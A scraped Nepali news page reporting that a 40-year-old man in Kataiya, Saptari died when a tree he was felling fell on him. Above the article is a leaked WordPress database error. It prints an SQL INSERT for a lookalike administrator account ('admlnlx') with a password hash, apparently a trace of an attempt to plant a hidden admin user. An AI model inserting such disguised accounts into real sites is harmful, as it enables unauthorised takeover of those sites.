WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2b0wnrOPFjcV2ZKlQcDIcSK9VHHXa0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 07:47:25', '', 'admlnlx', 'admlnlx')
राजविराज, मंसिर ३०–
सप्तरीको कटैयामा रूख ढाल्दा रुखले किचेर एकजना युवकको बुधबार मृत्यु भएको छ । मृत्यु हुनेमा कटैया–३ बस्ने ४० वर्षीय युवराज मण्डल रहेको प्रहरीले जनाएको छ ।
आफ्नै घरको छेउमा रहेको बारीमा रूख काट्ने क्रममा रूख ढलेर किच्दा उनको मृत्यु भएको जिल्ला प्रहरी कार्यालय सप्तरीले जनाएको छ । उनको शवपरीक्षणका लागि राजविराजस्थित गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पतालमा राखिएको प्रहरीले बताएको छ ।